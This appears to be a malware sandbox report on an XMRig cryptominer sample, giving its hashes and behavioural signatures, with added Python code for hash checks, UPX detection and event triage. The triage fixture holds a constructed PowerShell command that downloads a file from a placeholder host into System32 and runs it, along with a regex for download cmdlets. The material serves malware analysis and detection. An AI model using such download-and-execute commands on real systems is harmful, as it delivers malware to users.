General

  • Target

    efdd5405ba012bc1bc269c43bea30130_NEAS

  • Size

    2.9MB

  • Sample

    240507-v16fmaaf94

  • MD5

    efdd5405ba012bc1bc269c43bea30130

  • SHA1

    46e976281f9675f131fc3f26aaf5b6816226289c

  • SHA256

    03653fde53a203d14c9391b76b18649da3b42ab062863912341d15506c2cac69

  • SHA512

    e0bf495458afde9d4c77c7c9ccf4d7363ceb90deddb946b29e40bd6f237c290215977d28ac6436b39854493b1a6589b51d6a36080721468e32f464ceb33e54cf

  • SSDEEP

    49152:S1G1NtyBwTI3ySZbrkXV1etEKLlWUTOfeiRA2R76zHrWax9hMkFfdg6NsIRh4HEx:S1ONtyBeSFkXV1etEKLlWUTOfeiRA2RA

Malware Config

Targets

    • Target

      efdd5405ba012bc1bc269c43bea30130_NEAS

    • xmrig

      XMRig is a high-performance, open-source, cross-platform CPU/GPU miner.

    • XMRig Miner payload

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      PowerShell Invoke-WebRequest.

    • Executes dropped EXE

    • Loads dropped DLL

    • UPX packed file

      Detects executables packed with the UPX open-source packer or a modified UPX build.

    • Legitimate hosting services abused for malware hosting/C2

    • Drops file in System32 directory
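To confirm that a local copy is the file the General section describes, and to reproduce the section-name check behind the "UPX packed file" signature, here is an added Python example written for this page (it is not code from tria.ge or from the report). It assumes the file is available as bytes; the PE produced by build_minimal_pe is a constructed, header-only skeleton used as test input and is not the sample. The section-name test is only the stock-UPX heuristic: a modified UPX build can rename its sections, so a miss does not prove the file is unpacked.

```python
import hashlib
import struct

# Digests exactly as listed in the report's General section.
REPORT_HASHES = {
    "md5": "efdd5405ba012bc1bc269c43bea30130",
    "sha1": "46e976281f9675f131fc3f26aaf5b6816226289c",
    "sha256": "03653fde53a203d14c9391b76b18649da3b42ab062863912341d15506c2cac69",
    "sha512": "e0bf495458afde9d4c77c7c9ccf4d7363ceb90deddb946b29e40bd6f237c290215977d28ac6436b39854493b1a6589b51d6a36080721468e32f464ceb33e54cf",
}


def hash_bytes(data: bytes) -> dict:
    """Compute the four digests the report lists, as lowercase hex."""
    return {name: hashlib.new(name, data).hexdigest() for name in REPORT_HASHES}


def matches_report(data: bytes) -> bool:
    """True only if every digest agrees with the report; one mismatch means a different file."""
    return hash_bytes(data) == REPORT_HASHES


def pe_section_names(data: bytes) -> list:
    """Return the section names of a PE image, or [] if the bytes are not a PE.

    Layout used: e_lfanew at 0x3C points to 'PE\\0\\0'; the 20-byte COFF header
    follows with NumberOfSections at +2 and SizeOfOptionalHeader at +16; the
    section table (40-byte entries, 8-byte name first) follows the optional header.
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        return []
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return []
    coff = e_lfanew + 4
    if len(data) < coff + 20:
        return []
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    table = coff + 20 + opt_size
    names = []
    for i in range(num_sections):
        entry = data[table + 40 * i: table + 40 * i + 40]
        if len(entry) < 40:
            break  # truncated section table: stop rather than misparse
        names.append(entry[:8].rstrip(b"\0").decode("ascii", "replace"))
    return names


def is_upx_packed(data: bytes) -> bool:
    """Stock UPX names its sections UPX0/UPX1 (sometimes UPX2). A renamed build evades this check."""
    return any(name.startswith("UPX") for name in pe_section_names(data))


def build_minimal_pe(section_names) -> bytes:
    """Constructed test input: a PE skeleton with headers and a section table only (not executable)."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # COFF header: Machine=i386, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader=0xE0 (PE32), Characteristics (executable, 32-bit).
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, 0xE0, 0x0102)
    optional = b"\x0b\x01" + b"\0" * (0xE0 - 2)  # PE32 magic, remaining fields zeroed
    sections = b"".join(name.encode().ljust(8, b"\0") + b"\0" * 32 for name in section_names)
    return dos + b"PE\0\0" + coff + optional + sections
```

Before triaging a local copy, run matches_report on its bytes; a False result means the file is not sample 240507-v16fmaaf94, whatever its name says. pe_section_names is also the place to look at section sizes and entropy if the UPX name check comes back empty but the file still looks packed.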

MITRE ATT&CK Enterprise v15
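The PowerShell (T1059.001), "Executes dropped EXE" and "Drops file in System32 directory" signatures describe behaviour that can be re-derived from process-creation and file-creation events. The following is an added Python example, not part of the tria.ge report or its signature set; the event trace, PIDs, the file name dropped.exe and the URL https://example.invalid/ are constructed placeholders and do not describe what this sample actually did.

```python
import re

# Constructed Sysmon-style trace (process_create / file_create), in time order.
# Paths, PIDs, the dropped file name and the URL are placeholders, not report data.
SAMPLE_EVENTS = [
    {"type": "process_create", "pid": 100, "ppid": 1,
     "image": r"C:\Users\user\Desktop\efdd5405ba012bc1bc269c43bea30130_NEAS.exe",
     "cmdline": "efdd5405ba012bc1bc269c43bea30130_NEAS.exe"},
    {"type": "process_create", "pid": 200, "ppid": 100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell -nop -w hidden -c "Invoke-WebRequest -Uri https://example.invalid/payload -OutFile C:\Windows\System32\dropped.exe"'},
    {"type": "file_create", "pid": 200, "path": r"C:\Windows\System32\dropped.exe"},
    {"type": "process_create", "pid": 300, "ppid": 200,
     "image": r"C:\Windows\System32\dropped.exe", "cmdline": "dropped.exe"},
    # Benign PowerShell use that must not trigger the web-request rule.
    {"type": "process_create", "pid": 400, "ppid": 1,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -c Get-Date"},
]

# Cmdlet, its alias, and the .NET download idioms most often seen in place of it.
WEB_REQUEST_RE = re.compile(r"invoke-webrequest|\biwr\b|net\.webclient|downloadfile|downloadstring", re.I)
SYSTEM32_PREFIX = "c:\\windows\\system32\\"


def is_powershell(image: str) -> bool:
    return image.lower().endswith(("\\powershell.exe", "\\pwsh.exe"))


def triage(events) -> dict:
    """Map each behavioural signature to the PIDs that exhibited it.

    Events are scanned in order, so a file must be written before a later
    process_create of the same path counts as 'executes dropped EXE'.
    """
    hits = {"powershell_web_request": [], "drops_file_in_system32": [], "executes_dropped_exe": []}
    dropped = {}  # lowercase path -> pid that wrote it
    for ev in events:
        if ev["type"] == "file_create":
            path = ev["path"].lower()
            dropped[path] = ev["pid"]
            if path.startswith(SYSTEM32_PREFIX):
                hits["drops_file_in_system32"].append(ev["pid"])
        elif ev["type"] == "process_create":
            if is_powershell(ev["image"]) and WEB_REQUEST_RE.search(ev["cmdline"]):
                hits["powershell_web_request"].append(ev["pid"])
            if ev["image"].lower() in dropped:
                hits["executes_dropped_exe"].append(ev["pid"])
    return hits


if __name__ == "__main__":
    for rule, pids in triage(SAMPLE_EVENTS).items():
        print(f"{rule}: {pids}")
```

The case-insensitive matching and the path normalisation matter in practice: Windows paths and PowerShell cmdlet names are case-insensitive, and a rule that compares them literally will miss a sample that writes `c:\windows\SYSTEM32\...` or calls `iwr`.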

Tasks